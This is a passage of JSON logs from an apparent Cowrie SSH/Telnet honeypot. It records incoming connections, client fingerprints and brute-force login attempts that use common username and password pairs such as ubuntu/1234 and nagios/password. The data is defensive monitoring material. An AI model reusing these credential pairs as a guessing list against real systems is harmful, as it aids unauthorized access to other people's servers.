2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:09:01.471194Z","src_ip":"134.199.174.250","session":"d3f90957434b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:09:02.155854Z","src_ip":"139.59.14.27","session":"b3ffd4262114"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:02.492823Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:02.494511Z","src_ip":"139.59.14.27","session":"b3ffd4262114"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"admin123","message":"login attempt [ubuntu/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:09:02.594806Z","src_ip":"134.199.174.250","session":"d3f90957434b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:03.863936Z","src_ip":"134.199.174.250","session":"d3f90957434b"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":41198,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c789cd11bc2","protocol":"ssh","message":"New connection: 134.199.174.250:41198 (1.2.3.4:22) [session: 1c789cd11bc2]","sensor":"my-vps","timestamp":"2025-09-08T13:09:30.820282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:09:30.821129Z","src_ip":"134.199.174.250","session":"1c789cd11bc2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:09:31.087669Z","src_ip":"134.199.174.250","session":"1c789cd11bc2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234","message":"login attempt [ubuntu/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:09:31.990800Z","src_ip":"134.199.174.250","session":"1c789cd11bc2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:33.260739Z","src_ip":"134.199.174.250","session":"1c789cd11bc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56382,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0f5d4879796","protocol":"ssh","message":"New connection: 212.227.235.229:56382 (1.2.3.4:22) [session: b0f5d4879796]","sensor":"my-vps","timestamp":"2025-09-08T13:09:36.246952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:09:36.248623Z","src_ip":"212.227.235.229","session":"b0f5d4879796"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:09:36.512721Z","src_ip":"212.227.235.229","session":"b0f5d4879796"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"password1","message":"login attempt [webapp/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:09:37.603508Z","src_ip":"212.227.235.229","session":"b0f5d4879796"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:38.867865Z","src_ip":"212.227.235.229","session":"b0f5d4879796"}
{"eventid":"cowrie.session.connect","src_ip":"121.158.232.133","src_port":50226,"dst_ip":"1.2.3.4","dst_port":23,"session":"57d9303a6e89","protocol":"telnet","message":"New connection: 121.158.232.133:50226 (1.2.3.4:23) [session: 57d9303a6e89]","sensor":"my-vps","timestamp":"2025-09-08T13:09:39.632361Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f40d4e456b","protocol":"ssh","message":"New connection: 212.227.235.229:40508 (1.2.3.4:22) [session: e3f40d4e456b]","sensor":"my-vps","timestamp":"2025-09-08T13:09:54.150072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:09:54.151344Z","src_ip":"212.227.235.229","session":"e3f40d4e456b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:09:54.321356Z","src_ip":"212.227.235.229","session":"e3f40d4e456b"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password","message":"login attempt [nagios/password] failed","sensor":"my-vps","timestamp":"2025-09-08T13:09:55.033087Z","src_ip":"212.227.235.229","session":"e3f40d4e456b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:56.201887Z","src_ip":"212.227.235.229","session":"e3f40d4e456b"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55236,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd0389177bcb","protocol":"ssh","message":"New connection: 134.199.174.250:55236 (1.2.3.4:22) [session: cd0389177bcb]","sensor":"my-vps","timestamp":"2025-09-08T13:10:00.702390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:10:00.703358Z","src_ip":"134.199.174.250","session":"cd0389177bcb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:10:00.998438Z","src_ip":"134.199.174.250","session":"cd0389177bcb"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123","message":"login attempt [ubuntu/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:10:02.004903Z","src_ip":"134.199.174.250","session":"cd0389177bcb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:10:03.335530Z","src_ip":"134.199.174.250","session":"cd0389177bcb"}
{"eventid":"cowrie.session.closed","duration":31.38727331161499,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:10:11.019568Z","src_ip":"121.158.232.133","session":"57d9303a6e89"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42522,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d3a5e0aaa4","protocol":"ssh","message":"New connection: 139.59.14.27:42522 (1.2.3.4:22) [session: f3d3a5e0aaa4]","sensor":"my-vps","timestamp":"2025-09-08T13:10:23.537357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:10:23.538289Z","src_ip":"139.59.14.27","session":"f3d3a5e0aaa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:10:23.900265Z","src_ip":"139.59.14.27","session":"f3d3a5e0aaa4"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"webapp@2025","message":"login attempt [webapp/webapp@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:10:25.345205Z","src_ip":"139.59.14.27","session":"f3d3a5e0aaa4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:10:26.709815Z","src_ip":"139.59.14.27","session":"f3d3a5e0aaa4"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58658,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a6d02c1d7bd","protocol":"ssh","message":"New connection: 134.199.174.250:58658 (1.2.3.4:22) [session: 9a6d02c1d7bd]","sensor":"my-vps","timestamp":"2025-09-08T13:10:30.703440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:10:30.721283Z","src_ip":"134.199.174.250","session":"9a6d02c1d7bd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:10:31.031181Z","src_ip":"134.199.174.250","session":"9a6d02c1d7bd"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwerty123","message":"login attempt [ubuntu/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:10:32.221771Z","src_ip":"134.199.174.250","session":"9a6d02c1d7bd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:10:33.539162Z","src_ip":"134.199.174.250","session":"9a6d02c1d7bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54862,"dst_ip":"1.2.3.4","dst_port":22,"session":"91e721a4577e","protocol":"ssh","message":"New connection: 212.227.235.229:54862 (1.2.3.4:22) [session: 91e721a4577e]","sensor":"my-vps","timestamp":"2025-09-08T13:10:54.061277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:10:54.062709Z","src_ip":"212.227.235.229","session":"91e721a4577e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:10:54.322259Z","src_ip":"212.227.235.229","session":"91e721a4577e"}
{"eventid":"cowrie.login.failed","username":"user","password":"p@ssword","message":"login attempt [user/p@ssword] failed","sensor":"my-vps","timestamp":"2025-09-08T13:10:55.396980Z","src_ip":"212.227.235.229","session":"91e721a4577e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:10:56.661476Z","src_ip":"212.227.235.229","session":"91e721a4577e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":35998,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc64d7793ed1","protocol":"ssh","message":"New connection: 134.199.174.250:35998 (1.2.3.4:22) [session: bc64d7793ed1]","sensor":"my-vps","timestamp":"2025-09-08T13:11:01.532119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:11:01.533268Z","src_ip":"134.199.174.250","session":"bc64d7793ed1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:11:01.796121Z","src_ip":"134.199.174.250","session":"bc64d7793ed1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40624,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ccf46438d8","protocol":"ssh","message":"New connection: 212.227.235.229:40624 (1.2.3.4:22) [session: e0ccf46438d8]","sensor":"my-vps","timestamp":"2025-09-08T13:11:01.927097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:11:01.927791Z","src_ip":"212.227.235.229","session":"e0ccf46438d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:11:02.088956Z","src_ip":"212.227.235.229","session":"e0ccf46438d8"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1q2w3e4r","message":"login attempt [ubuntu/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:11:02.647312Z","src_ip":"134.199.174.250","session":"bc64d7793ed1"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia.123","message":"login attempt [nvidia/nvidia.123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:11:02.775224Z","src_ip":"212.227.235.229","session":"e0ccf46438d8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:11:03.938200Z","src_ip":"212.227.235.229","session":"e0ccf46438d8"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:11:03.979910Z","src_ip":"134.199.174.250","session":"bc64d7793ed1"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52462,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c94397c0ab3","protocol":"ssh","message":"New connection: 134.199.174.250:52462 (1.2.3.4:22) [session: 7c94397c0ab3]","sensor":"my-vps","timestamp":"2025-09-08T13:11:32.430648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:11:32.456901Z","src_ip":"134.199.174.250","session":"7c94397c0ab3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecds